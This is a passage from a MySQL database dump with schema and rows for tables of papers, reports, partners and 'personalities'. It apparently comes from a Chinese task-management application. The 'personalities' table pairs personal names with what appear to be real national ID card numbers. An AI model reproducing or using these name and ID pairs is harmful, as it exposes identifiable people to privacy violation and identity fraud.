08:30:28',1),(17,'11',143,49,'2020-03-24 08:41:59','2020-03-24 08:42:07',1),(18,'k\'l\'l刻录了绿绿绿',161,49,'2020-03-24 17:19:57','2020-03-24 17:20:06',1);
|
||
/*!40000 ALTER TABLE `paper_reports` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `papers`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `papers`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `papers` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`number` varchar(255) NOT NULL,
|
||
`status` int(11) NOT NULL DEFAULT '0',
|
||
`read` tinyint(1) DEFAULT '0',
|
||
`read_at` datetime DEFAULT NULL,
|
||
`parent_id` int(11) DEFAULT NULL,
|
||
`lft` int(11) NOT NULL,
|
||
`rgt` int(11) NOT NULL,
|
||
`depth` int(11) NOT NULL DEFAULT '0',
|
||
`children_count` int(11) NOT NULL DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`task_id` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`thumbs_up` int(11) DEFAULT '0',
|
||
`agreement_signing_at` datetime DEFAULT NULL,
|
||
`verify_status` tinyint(1) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_papers_on_task_id` (`task_id`),
|
||
KEY `index_papers_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=183 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `papers`
|
||
--
|
||
|
||
LOCK TABLES `papers` WRITE;
|
||
/*!40000 ALTER TABLE `papers` DISABLE KEYS */;
|
||
INSERT INTO `papers` VALUES (1,'54387687',2,1,'2019-08-15 09:36:58',NULL,1,10,0,0,'2019-08-06 09:56:23','2019-08-16 09:35:37',1,47,0,NULL,0),(2,'56086299',0,1,'2019-08-15 09:36:58',1,2,3,1,0,'2019-08-06 09:57:41','2019-08-15 09:36:58',1,47,0,NULL,0),(3,'05131785',0,1,'2019-08-15 09:36:58',1,4,5,1,0,'2019-08-06 09:59:04','2019-08-15 09:36:58',1,47,0,NULL,0),(4,'59534880',0,1,'2019-08-15 09:36:58',1,6,7,1,0,'2019-08-06 11:13:54','2019-08-15 09:36:58',1,46,0,NULL,0),(5,'77288819',0,1,'2019-08-15 09:36:58',1,8,9,1,0,'2019-08-07 14:58:03','2019-08-15 09:36:58',1,51,0,NULL,0),(7,'74335046',2,1,'2019-08-12 10:44:27',NULL,11,12,0,0,'2019-08-07 15:06:43','2019-08-12 10:44:27',4,51,0,NULL,0),(8,'99807600',0,1,'2019-08-12 10:42:19',NULL,13,14,0,0,'2019-08-07 15:51:05','2019-08-12 10:42:19',4,49,0,NULL,0),(9,'85107765',0,1,'2019-08-15 09:36:58',NULL,15,18,0,0,'2019-08-07 15:53:12','2019-08-15 09:36:58',1,52,0,NULL,0),(10,'48058286',2,1,'2019-08-09 09:14:07',NULL,19,20,0,0,'2019-08-07 15:58:29','2019-08-09 09:14:07',2,49,0,NULL,0),(11,'34818064',0,1,'2019-08-15 09:36:58',NULL,21,22,0,0,'2019-08-07 16:14:05','2019-08-15 09:36:58',1,50,0,NULL,0),(12,'81294176',0,1,'2019-08-15 09:36:58',9,16,17,1,0,'2019-08-07 16:14:38','2019-08-15 09:36:58',1,52,0,NULL,0),(13,'75755783',0,1,'2019-08-07 16:51:27',NULL,23,24,0,0,'2019-08-07 16:45:02','2019-08-07 16:51:27',6,50,0,NULL,0),(14,'50136912',2,0,NULL,NULL,25,26,0,0,'2019-08-07 16:50:03','2019-08-09 15:32:39',6,46,0,NULL,0),(15,'05223740',4,1,'2019-10-25 11:19:03',NULL,27,32,0,0,'2019-08-09 09:45:38','2019-10-25 11:19:03',5,49,0,NULL,0),(16,'91155426',2,1,'2019-08-12 10:44:34',NULL,33,34,0,0,'2019-08-09 15:10:49','2019-08-12 10:44:34',4,50,0,NULL,0),(17,'99652605',2,1,'2019-08-26 14:07:28',NULL,35,42,0,0,'2019-08-09 15:26:04','2019-08-26 14:07:28',7,49,0,NULL,0),(18,'92620323',0,1,'2019-08-26 14:07:28',17,36,37,1,0,'2019-08-09 15:58:29','2019-08-26 14:07:28',7,49,0,NULL,0),(19,'49649197',2,1,'2019-10-29 16:22:42',NULL,43,44,0,0,'2019-08-13 08:56:16','2019-10-29 16:22:42',8,49,0,NULL,0),(20,'34618952',4,1,'2019-10-25 11:19:03',15,28,29,1,0,'2019-08-13 10:29:13','2019-10-25 11:19:03',5,49,0,NULL,0),(21,'97701142',4,1,'2019-10-25 11:19:03',15,30,31,1,0,'2019-08-13 10:29:38','2019-10-25 11:19:03',5,49,0,NULL,0),(22,'25025589',0,1,'2019-08-15 09:36:58',NULL,45,46,0,0,'2019-08-13 10:53:54','2019-08-15 09:36:58',1,53,0,NULL,0),(23,'82442181',3,1,'2019-10-25 11:19:03',NULL,47,50,0,0,'2019-08-13 11:31:58','2019-10-25 11:19:03',5,53,0,NULL,0),(24,'79992945',1,1,'2019-10-08 08:52:47',NULL,51,52,0,0,'2019-08-13 12:42:53','2019-10-08 08:52:47',9,52,0,NULL,0),(25,'30595237',1,1,'2019-10-09 10:06:34',NULL,53,54,0,0,'2019-08-13 12:52:04','2019-10-09 10:06:34',9,53,0,NULL,0),(26,'17637511',2,1,'2019-08-13 15:43:49',NULL,55,56,0,0,'2019-08-13 12:55:47','2019-09-07 13:56:29',9,50,0,'2019-09-08 00:00:00',0),(27,'97707649',4,1,'2019-10-25 11:19:03',23,48,49,1,0,'2019-08-13 14:35:47','2019-10-25 11:19:03',5,49,0,NULL,0),(28,'52383216',4,1,'2019-10-25 11:19:03',NULL,57,58,0,0,'2019-08-13 14:49:56','2019-10-25 11:19:03',5,52,0,NULL,0),(29,'19793930',2,1,'2020-10-15 08:21:28',NULL,59,60,0,0,'2019-08-13 15:28:00','2020-10-15 08:21:28',9,49,0,NULL,0),(30,'14804032',1,1,'2019-10-08 08:52:17',NULL,61,62,0,0,'2019-08-13 16:14:43','2019-10-08 08:52:17',11,49,0,NULL,0),(31,'08715056',2,1,'2019-10-25 11:18:51',NULL,63,64,0,0,'2019-08-13 16:16:02','2019-10-25 11:18:51',11,53,0,NULL,0),(32,'17965228',0,1,'2019-08-26 14:07:28',17,38,39,1,0,'2019-08-13 18:29:18','2019-08-26 14:07:28',7,50,0,NULL,0),(33,'92067274',0,1,'2019-08-26 14:07:28',17,40,41,1,0,'2019-08-13 18:29:43','2019-08-26 14:07:28',7,50,0,NULL,0),(36,'68589551',2,1,'2019-08-23 15:04:02',NULL,65,66,0,0,'2019-08-23 12:58:01','2019-08-23 15:04:02',15,20,0,NULL,0),(38,'16243686',1,1,'2019-12-30 09:59:04',NULL,67,68,0,0,'2019-08-26 09:57:51','2019-12-30 09:59:04',18,49,0,NULL,0),(39,'49545342',1,1,'2019-12-30 09:59:04',NULL,69,76,0,0,'2019-08-26 09:59:06','2019-12-30 09:59:04',18,20,0,NULL,0),(40,'38026941',0,1,'2019-12-30 09:59:04',39,70,71,0,0,'2019-08-26 10:01:33','2019-12-30 09:59:04',18,50,0,NULL,0),(41,'13948137',0,1,'2019-12-30 09:59:04',39,72,73,0,0,'2019-08-26 10:02:02','2019-12-30 09:59:04',18,50,0,NULL,0),(42,'32955274',0,1,'2019-12-30 09:59:04',39,74,75,0,0,'2019-08-26 10:05:44','2019-12-30 09:59:04',18,50,0,NULL,0),(43,'49200990',2,1,'2019-08-26 10:34:41',NULL,77,78,0,0,'2019-08-26 10:28:37','2019-08-27 16:51:35',19,49,0,'2019-08-26 00:00:00',0),(44,'83625473',2,1,'2019-08-26 10:37:23',NULL,79,80,0,0,'2019-08-26 10:33:50','2019-08-27 16:51:35',19,20,0,'2019-08-26 00:00:00',0),(45,'38034589',2,1,'2019-10-25 15:14:55',NULL,81,82,0,0,'2019-08-26 10:42:12','2019-10-25 15:14:55',20,20,0,NULL,0),(46,'14620412',2,1,'2019-10-25 15:14:55',NULL,83,84,0,0,'2019-08-26 10:42:52','2019-10-25 15:14:55',20,49,0,NULL,0),(47,'54577089',2,1,'2019-08-26 10:48:30',NULL,85,86,0,0,'2019-08-26 10:46:29','2019-08-26 10:48:30',22,49,0,NULL,0),(48,'89869737',2,1,'2019-08-26 10:50:44',NULL,87,88,0,0,'2019-08-26 10:46:48','2019-08-26 10:50:44',21,49,0,NULL,0),(49,'46211394',2,1,'2019-08-26 10:48:20',NULL,89,90,0,0,'2019-08-26 10:47:43','2019-08-26 10:48:20',22,20,0,NULL,0),(50,'05339770',2,1,'2019-08-26 10:50:37',NULL,91,92,0,0,'2019-08-26 10:48:08','2019-08-26 10:50:37',21,20,0,NULL,0),(51,'49019099',2,1,'2019-09-06 09:05:51',NULL,93,94,0,0,'2019-09-06 08:52:23','2019-09-06 09:05:51',23,20,0,NULL,0),(52,'09570957',0,1,'2019-09-16 11:20:37',NULL,95,96,0,0,'2019-09-16 10:32:48','2019-09-16 11:20:37',24,56,0,NULL,0),(53,'72146984',1,1,'2020-03-26 16:54:05',NULL,97,98,0,0,'2019-10-25 10:08:28','2020-03-26 16:54:05',25,46,0,NULL,0),(54,'27917522',2,1,'2020-03-26 16:54:05',NULL,99,100,0,0,'2019-10-25 14:42:30','2020-03-26 16:54:05',25,50,0,NULL,1),(55,'09106569',1,1,'2020-03-26 16:54:05',NULL,101,102,0,0,'2019-10-25 14:43:07','2020-03-26 16:54:05',25,59,0,NULL,0),(56,'39497881',2,1,'2019-10-25 16:32:27',NULL,103,104,0,0,'2019-10-25 14:43:45','2019-10-25 16:32:27',26,50,0,NULL,0),(57,'48777681',1,1,'2019-10-25 16:31:17',NULL,105,106,0,0,'2019-10-25 15:29:51','2019-10-25 16:31:17',29,59,0,NULL,0),(58,'21252364',2,1,'2019-10-25 16:31:17',NULL,107,108,0,0,'2019-10-25 15:30:23','2019-10-25 16:31:17',29,50,0,NULL,0),(59,'14957684',2,1,'2019-10-25 16:31:17',NULL,109,110,0,0,'2019-10-25 15:30:58','2019-10-25 16:31:17',29,46,0,NULL,0),(60,'39191775',2,1,'2019-10-25 16:32:27',NULL,111,112,0,0,'2019-10-25 16:12:56','2019-10-25 16:32:27',26,59,0,NULL,0),(61,'68068941',1,1,'2019-10-25 16:32:27',NULL,113,114,0,0,'2019-10-25 16:17:12','2019-10-25 16:32:27',26,46,0,NULL,0),(62,'99341137',1,1,'2020-12-01 08:45:51',NULL,115,116,0,0,'2019-10-27 14:12:07','2020-12-01 08:45:51',30,46,0,NULL,1),(63,'44145811',2,1,'2020-12-01 08:45:51',NULL,117,118,0,0,'2019-10-27 14:12:10','2020-12-01 08:45:51',30,59,0,NULL,1),(64,'84148293',1,1,'2020-12-01 08:45:51',NULL,119,122,0,0,'2019-10-27 14:16:02','2020-12-01 08:45:51',30,50,0,NULL,1),(65,'56262205',0,1,'2020-12-01 08:45:51',64,120,121,0,0,'2019-10-27 14:20:59','2020-12-01 08:45:51',30,49,0,NULL,1),(69,'91719331',1,1,'2019-10-27 15:05:27',NULL,123,124,0,0,'2019-10-27 15:01:36','2019-10-27 15:05:27',32,46,0,NULL,1),(70,'91409755',2,1,'2019-10-27 15:09:40',NULL,125,126,0,0,'2019-10-27 15:02:56','2019-10-27 15:09:40',32,59,0,NULL,1),(71,'85915744',2,1,'2019-10-27 15:06:00',NULL,127,128,0,0,'2019-10-27 15:04:04','2019-10-27 15:06:00',32,50,0,NULL,1),(79,'57222353',0,0,NULL,NULL,129,130,0,0,'2019-11-01 15:46:48','2019-11-01 15:46:48',48,64,0,NULL,0),(80,'37676519',0,0,NULL,NULL,131,132,0,0,'2019-11-01 15:58:28','2019-11-01 15:58:28',48,65,0,NULL,0),(81,'77052656',0,0,NULL,NULL,133,134,0,0,'2019-11-01 16:30:36','2019-11-01 16:30:36',48,63,0,NULL,0),(82,'81973395',0,1,'2019-11-05 11:02:22',NULL,135,136,0,0,'2019-11-05 11:00:01','2019-11-05 11:02:22',55,50,0,NULL,0),(83,'87636462',0,1,'2019-11-05 11:02:22',NULL,137,138,0,0,'2019-11-05 11:00:32','2019-11-05 11:02:22',55,46,0,NULL,0),(84,'39682239',2,1,'2019-11-05 15:47:07',NULL,139,140,0,0,'2019-11-05 15:21:17','2019-11-05 15:47:07',54,65,0,NULL,1),(85,'16192783',1,0,NULL,NULL,141,142,0,0,'2019-11-05 15:23:52','2019-11-05 15:23:52',54,46,0,NULL,1),(86,'05297606',2,0,NULL,NULL,143,144,0,0,'2019-11-05 15:36:29','2019-11-05 15:36:29',54,64,0,NULL,1),(87,'71174714',1,0,NULL,NULL,145,146,0,0,'2019-11-05 15:49:57','2019-11-05 15:49:57',54,63,0,NULL,1),(88,'79976326',0,1,'2019-11-05 16:01:10',NULL,147,148,0,0,'2019-11-05 16:00:28','2019-11-05 16:01:10',56,50,0,NULL,0),(89,'35448721',2,0,NULL,NULL,149,150,0,0,'2019-11-06 17:08:19','2019-11-06 17:08:19',57,66,0,NULL,1),(90,'59286299',2,0,NULL,NULL,151,152,0,0,'2019-11-06 17:08:52','2019-11-06 17:08:52',57,65,0,NULL,1),(91,'25209141',1,0,NULL,NULL,153,154,0,0,'2019-11-06 17:09:07','2019-11-06 17:09:07',57,63,0,NULL,1),(92,'86921987',0,0,NULL,NULL,155,156,0,0,'2019-11-07 11:28:03','2019-11-07 11:28:03',58,59,0,NULL,0),(93,'99738996',1,1,'2019-11-07 16:54:40',NULL,157,158,0,0,'2019-11-07 16:46:39','2019-11-07 16:54:40',60,65,0,NULL,1),(94,'31678915',2,1,'2019-11-07 16:54:41',NULL,159,160,0,0,'2019-11-07 16:46:45','2019-11-07 16:54:41',60,64,0,NULL,1),(95,'09313272',2,1,'2019-11-07 16:54:42',NULL,161,162,0,0,'2019-11-07 16:47:23','2019-11-07 16:54:42',60,63,0,NULL,1),(96,'71569810',1,0,NULL,NULL,163,164,0,0,'2019-11-10 13:36:51','2019-11-10 13:36:51',61,66,0,NULL,1),(98,'42459157',1,0,NULL,NULL,165,166,0,0,'2019-11-10 13:37:37','2019-11-10 13:37:37',62,66,0,NULL,1),(99,'01375063',2,1,'2019-11-10 13:43:48',NULL,167,168,0,0,'2019-11-10 13:39:47','2019-11-10 13:43:48',61,64,0,NULL,1),(100,'79885489',2,0,NULL,NULL,169,170,0,0,'2019-11-10 13:40:05','2019-11-10 13:40:05',62,64,0,NULL,1),(102,'49818005',2,1,'2019-11-10 13:43:45',NULL,171,172,0,0,'2019-11-10 13:41:41','2019-11-10 13:43:45',61,65,0,NULL,1),(104,'99823656',2,0,NULL,NULL,173,174,0,0,'2019-11-10 13:42:17','2019-11-10 13:42:17',62,65,0,NULL,1),(105,'13036063',1,0,NULL,NULL,175,176,0,0,'2019-11-10 13:45:13','2019-11-10 13:45:13',61,63,0,NULL,1),(107,'18728565',1,0,NULL,NULL,177,178,0,0,'2019-11-10 13:46:38','2019-11-10 13:46:38',62,63,0,NULL,1),(112,'73068674',1,1,'2020-01-10 14:34:41',NULL,179,180,0,0,'2019-11-13 08:46:56','2020-01-10 14:34:41',69,46,0,NULL,1),(113,'32919359',2,1,'2020-01-10 14:34:41',NULL,181,182,0,0,'2019-11-13 08:51:15','2020-01-10 14:34:41',69,65,0,NULL,1),(121,'04582138',3,1,'2019-12-30 08:40:10',NULL,183,186,0,0,'2019-11-21 15:03:02','2019-12-30 08:40:10',76,63,0,NULL,1),(122,'83450830',4,1,'2019-12-30 08:40:10',NULL,187,192,0,0,'2019-11-21 15:03:16','2019-12-30 08:40:10',76,50,0,NULL,1),(123,'30006300',0,1,'2019-12-30 08:40:10',121,184,185,0,0,'2019-11-21 15:58:52','2019-12-30 08:40:10',76,63,0,NULL,1),(124,'47711664',0,1,'2019-12-30 08:40:10',122,188,189,0,0,'2019-11-21 16:01:08','2019-12-30 08:40:10',76,63,0,NULL,1),(126,'68047272',0,1,'2019-12-30 08:40:10',122,190,191,0,0,'2019-11-21 16:05:01','2019-12-30 08:40:10',76,63,0,NULL,1),(127,'80472302',0,1,'2020-01-10 14:31:08',NULL,193,194,0,0,'2019-12-30 10:07:20','2020-01-10 14:31:08',94,64,0,NULL,0),(128,'37452426',2,1,'2020-01-10 14:32:56',NULL,195,196,0,0,'2019-12-30 10:16:20','2020-01-10 14:32:56',92,64,0,NULL,1),(129,'89871376',1,1,'2020-01-10 14:32:56',NULL,197,198,0,0,'2019-12-30 15:01:49','2020-01-10 14:32:56',92,66,0,NULL,1),(130,'83326702',1,1,'2020-01-10 14:32:56',NULL,199,200,0,0,'2019-12-30 15:09:41','2020-01-10 14:32:56',92,46,0,NULL,1),(131,'04569373',0,0,NULL,NULL,201,202,0,0,'2019-12-30 15:38:01','2019-12-30 15:38:01',93,46,0,NULL,0),(132,'96140045',0,0,NULL,NULL,203,204,0,0,'2019-12-30 15:39:39','2019-12-30 15:39:39',93,64,0,NULL,0),(133,'13829677',1,1,'2020-03-23 15:35:52',NULL,205,206,0,0,'2020-03-23 10:20:39','2020-03-23 15:35:52',100,73,0,NULL,1),(134,'80975822',1,1,'2020-03-24 08:30:32',NULL,207,208,0,0,'2020-03-23 10:22:39','2020-03-24 08:30:32',100,63,0,NULL,1),(135,'03806232',1,1,'2020-03-23 15:25:41',NULL,209,210,0,0,'2020-03-23 10:23:53','2020-03-23 15:25:41',100,66,0,NULL,1),(136,'84234503',1,1,'2020-03-25 11:28:06',NULL,211,212,0,0,'2020-03-23 14:51:58','2020-03-25 11:28:06',103,46,0,NULL,1),(137,'62637871',1,1,'2020-03-25 11:27:56',NULL,213,214,0,0,'2020-03-23 14:58:18','2020-03-25 11:27:56',103,63,0,NULL,1),(138,'36875070',2,1,'2020-03-26 16:54:38',NULL,215,216,0,0,'2020-03-23 15:05:21','2020-03-26 16:54:38',103,65,0,NULL,1),(139,'73215568',1,1,'2020-03-25 16:05:24',NULL,217,220,0,0,'2020-03-23 15:10:39','2020-03-25 16:05:24',95,46,0,NULL,1),(140,'55947796',1,1,'2020-03-25 16:05:24',NULL,221,222,0,0,'2020-03-23 15:15:49','2020-03-25 16:05:24',95,65,0,NULL,1),(141,'61715548',1,1,'2020-03-25 16:05:24',139,218,219,0,0,'2020-03-23 15:25:33','2020-03-25 16:05:24',95,65,0,NULL,1),(142,'36725145',1,1,'2020-03-26 16:53:48',NULL,223,224,0,0,'2020-03-24 08:23:27','2020-03-26 16:53:48',105,1,0,NULL,1),(143,'68897190',2,1,'2020-03-26 16:53:48',NULL,225,226,0,0,'2020-03-24 08:24:17','2020-03-26 16:53:48',105,73,0,NULL,1),(144,'95918586',0,0,NULL,NULL,227,228,0,0,'2020-03-24 08:48:58','2020-03-24 08:48:58',106,73,0,NULL,0),(145,'74666221',0,0,NULL,NULL,229,230,0,0,'2020-03-24 08:50:10','2020-03-24 08:50:10',107,73,0,NULL,0),(146,'02930889',2,1,'2020-03-27 16:04:15',NULL,231,232,0,0,'2020-03-24 08:50:57','2020-03-27 16:04:15',108,73,0,NULL,1),(147,'70553147',1,1,'2020-03-25 16:13:14',NULL,233,234,0,0,'2020-03-24 08:55:29','2020-03-25 16:13:14',96,46,0,NULL,1),(148,'77888234',2,1,'2020-03-25 16:13:14',NULL,235,236,0,0,'2020-03-24 08:56:01','2020-03-25 16:13:14',96,63,0,NULL,1),(149,'88887975',1,1,'2020-03-25 16:05:24',NULL,237,238,0,0,'2020-03-24 08:57:03','2020-03-25 16:05:24',95,63,0,NULL,1),(150,'74084942',1,1,'2020-03-27 16:04:15',NULL,239,240,0,0,'2020-03-24 08:57:42','2020-03-27 16:04:15',108,63,0,NULL,1),(151,'57334385',2,1,'2020-03-25 16:42:54',NULL,241,242,0,0,'2020-03-24 08:58:53','2020-03-25 16:42:54',99,63,0,NULL,1),(152,'43166494',1,1,'2020-03-25 16:42:54',NULL,243,244,0,0,'2020-03-24 08:59:58','2020-03-25 16:42:54',99,46,0,NULL,1),(153,'49221203',2,1,'2020-03-25 16:42:54',NULL,245,246,0,0,'2020-03-24 09:01:05','2020-03-25 16:42:54',99,66,0,NULL,1),(154,'28368911',0,0,NULL,NULL,247,248,0,0,'2020-03-24 09:02:17','2020-03-24 09:02:17',27,66,0,NULL,0),(155,'79935061',0,0,NULL,NULL,249,250,0,0,'2020-03-24 09:02:58','2020-03-24 09:02:58',27,46,0,NULL,0),(156,'18700624',0,0,NULL,NULL,251,252,0,0,'2020-03-24 09:03:26','2020-03-24 09:03:26',27,63,0,NULL,0),(157,'39650808',1,0,NULL,NULL,253,254,0,0,'2020-03-24 09:04:11','2020-03-24 09:04:11',98,63,0,NULL,1),(158,'93629661',1,0,NULL,NULL,255,256,0,0,'2020-03-24 09:04:41','2020-03-24 09:04:41',98,66,0,NULL,1),(159,'64067681',2,0,NULL,NULL,257,258,0,0,'2020-03-24 09:05:20','2020-03-24 09:05:20',98,46,0,NULL,1),(160,'09644970',2,1,'2020-03-25 16:05:24',NULL,259,260,0,0,'2020-03-24 09:09:38','2020-03-25 16:05:24',95,66,0,NULL,1),(161,'09756384',1,1,'2020-03-26 16:53:14',NULL,261,262,0,0,'2020-03-24 17:14:19','2020-03-26 16:53:14',104,1,0,NULL,1),(162,'99563654',0,0,NULL,NULL,263,264,0,0,'2020-03-25 15:52:36','2020-03-25 15:52:36',110,1,0,NULL,0),(163,'35308348',0,0,NULL,NULL,265,266,0,0,'2020-03-27 15:34:35','2020-04-03 15:33:31',89,1,0,NULL,1),(164,'43326474',0,0,NULL,NULL,267,268,0,0,'2020-03-27 15:35:25','2020-04-03 15:33:30',89,66,0,NULL,1),(165,'26500241',0,1,'2020-04-09 09:24:16',NULL,269,270,0,0,'2020-04-02 15:45:16','2020-04-09 09:24:16',113,1,0,NULL,1),(166,'80757417',2,1,'2020-04-20 09:32:58',NULL,271,272,0,0,'2020-04-09 09:10:13','2020-04-20 09:32:58',114,46,0,NULL,1),(167,'50694518',2,1,'2020-04-20 09:32:58',NULL,273,274,0,0,'2020-04-09 09:17:55','2020-04-20 09:32:58',114,66,0,NULL,1),(168,'41019327',1,0,NULL,NULL,275,276,0,0,'2020-10-15 10:26:59','2020-10-15 10:26:59',116,46,0,NULL,1),(169,'64763209',2,1,'2020-12-01 08:51:03',NULL,277,278,0,0,'2020-10-15 10:32:36','2020-12-01 08:51:03',116,66,0,NULL,1),(170,'79115925',1,0,NULL,NULL,279,280,0,0,'2020-10-15 10:42:04','2020-10-15 10:42:04',116,63,0,NULL,1),(171,'02339364',2,1,'2020-10-16 08:27:55',NULL,281,282,0,0,'2020-10-15 11:00:22','2020-10-16 08:27:55',115,46,0,NULL,1),(172,'91803932',1,1,'2020-10-16 08:27:55',NULL,283,284,0,0,'2020-10-15 11:03:54','2020-10-16 08:27:55',115,63,0,NULL,1),(173,'61703451',1,1,'2020-10-16 08:33:37',NULL,285,286,0,0,'2020-10-16 08:03:58','2020-10-16 08:33:37',117,46,0,NULL,1),(174,'05100536',2,1,'2020-10-16 08:33:37',NULL,287,288,0,0,'2020-10-16 08:05:10','2020-10-16 08:33:37',117,63,0,NULL,1),(175,'34072135',1,0,NULL,NULL,289,290,0,0,'2020-10-16 08:49:40','2020-10-16 08:49:40',118,46,0,NULL,1),(176,'02180550',2,0,NULL,NULL,291,292,0,0,'2020-10-16 08:50:27','2020-10-16 08:50:27',118,63,0,NULL,1),(177,'99410334',1,0,NULL,NULL,293,294,0,0,'2020-10-16 12:27:10','2020-10-16 12:27:10',119,46,0,NULL,1),(178,'52627468',2,0,NULL,NULL,295,296,0,0,'2020-10-16 12:33:15','2020-10-16 12:33:15',119,66,0,NULL,1),(179,'08842128',0,0,NULL,NULL,297,298,0,0,'2020-12-01 11:16:03','2020-12-01 11:16:03',120,46,0,NULL,0),(180,'37255433',2,1,'2021-02-23 14:46:32',NULL,299,300,0,0,'2021-02-23 14:45:26','2021-02-23 14:46:32',121,73,0,NULL,1),(181,'56597070',1,1,'2021-02-23 14:46:26',NULL,301,302,0,0,'2021-02-23 14:45:59','2021-02-23 14:46:26',121,1,0,NULL,1),(182,'72910212',2,0,NULL,NULL,303,304,0,0,'2021-02-23 16:36:00','2021-02-23 16:36:00',122,73,0,NULL,1);
|
||
/*!40000 ALTER TABLE `papers` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `partners`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `partners`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `partners` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`title` varchar(255) DEFAULT NULL,
|
||
`content` text,
|
||
`link` varchar(255) DEFAULT NULL,
|
||
`cover_url` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`attachment_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `partners`
|
||
--
|
||
|
||
LOCK TABLES `partners` WRITE;
|
||
/*!40000 ALTER TABLE `partners` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `partners` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `personalities`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `personalities`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `personalities` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`card` varchar(255) NOT NULL,
|
||
`entity_id` int(11) DEFAULT NULL,
|
||
`industry_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
UNIQUE KEY `index_personalities_on_card` (`card`),
|
||
KEY `index_personalities_on_name` (`name`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=73 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `personalities`
|
||
--
|
||
|
||
LOCK TABLES `personalities` WRITE;
|
||
/*!40000 ALTER TABLE `personalities` DISABLE KEYS */;
|
||
INSERT INTO `personalities` VALUES (1,'xamppp','666666666666666666',2,NULL,'2019-08-06 09:54:43','2020-02-11 09:50:42'),(3,'张翔','110108198410090015',5,2,'2019-08-07 14:59:25','2019-08-07 14:59:25'),(22,'张洋','342623199102282730',11,1,'2019-09-16 10:31:28','2019-09-16 10:31:28'),(23,'p79162350','412123199008091234',13,NULL,'2019-10-19 09:25:12','2019-10-19 09:25:12'),(25,'汪辉','432524198809298339',15,NULL,'2019-10-29 10:01:38','2019-10-29 10:01:38'),(26,'张翔','111122223333444455',20,NULL,'2019-11-01 15:57:08','2019-11-01 15:57:37'),(27,'翟小玉','111111111111111111',18,NULL,'2019-11-01 16:20:18','2019-11-01 16:27:29'),(28,'陈力','1111111111111111111112',21,2,'2019-11-01 16:20:49','2019-11-01 16:20:49'),(29,'闻市委','341224199310105310',30,NULL,'2020-02-01 18:54:47','2020-02-01 18:54:47'),(30,'王彦臻','610123198210310534',32,NULL,'2020-02-01 22:28:55','2020-02-01 22:28:55'),(31,'金松昌','41072719871223291X',31,NULL,'2020-02-01 22:30:58','2020-02-01 22:30:58'),(32,'尹桂信','12022419860215445X',34,NULL,'2020-02-04 22:25:47','2020-02-04 22:25:47'),(33,'任小广','429001198606078179',36,NULL,'2020-02-05 10:32:27','2020-02-05 10:32:27'),(34,'武云龙','13040219880625123X',41,NULL,'2020-02-05 10:41:09','2020-02-05 10:41:09'),(35,'赵名扬','120108199606240514',39,NULL,'2020-02-05 10:52:45','2020-02-05 10:52:45'),(36,'刘艺','340322199007300019',46,NULL,'2020-02-05 10:55:59','2020-02-05 10:55:59'),(37,'高俊苓','370883198805161624',55,NULL,'2020-02-05 15:06:50','2020-02-05 15:06:50'),(38,'王涛','130181198708216755',58,NULL,'2020-02-10 12:22:32','2020-02-10 12:22:32'),(39,'廖峭','21070219940619082X',59,NULL,'2020-03-19 13:56:33','2020-03-19 13:56:33'),(40,'周晨磊','130229198712196216',60,NULL,'2020-03-19 15:09:56','2020-03-19 15:09:56'),(41,'步晓婷','37068519890506062X',62,NULL,'2020-03-19 15:11:54','2020-03-19 15:11:54'),(42,'甄少峰','120102199107054719',61,NULL,'2020-03-19 15:12:17','2020-03-19 15:12:17'),(43,'刘海波','13093019960906001X',64,NULL,'2020-03-19 15:14:12','2020-03-19 15:14:12'),(44,'钟季龙','513823199007035516',65,NULL,'2020-03-23 08:31:11','2020-03-23 08:31:18'),(45,'1','123456789009876543',66,NULL,'2020-03-24 08:23:08','2020-03-24 08:23:08'),(46,'吴波','511025198502281274',67,NULL,'2020-03-27 19:21:15','2020-03-27 19:21:15'),(47,'xyz','211321190001020110',70,NULL,'2020-08-18 10:34:28','2020-08-18 10:34:28'),(49,'jaderd','458692315698512032',72,2,'2020-10-14 18:15:48','2020-10-14 18:15:48'),(50,'李光杰','211321000000000000',73,NULL,'2020-10-15 10:34:25','2020-10-15 10:34:25'),(51,'万云博','131127199205032492',78,NULL,'2020-12-16 16:08:53','2020-12-16 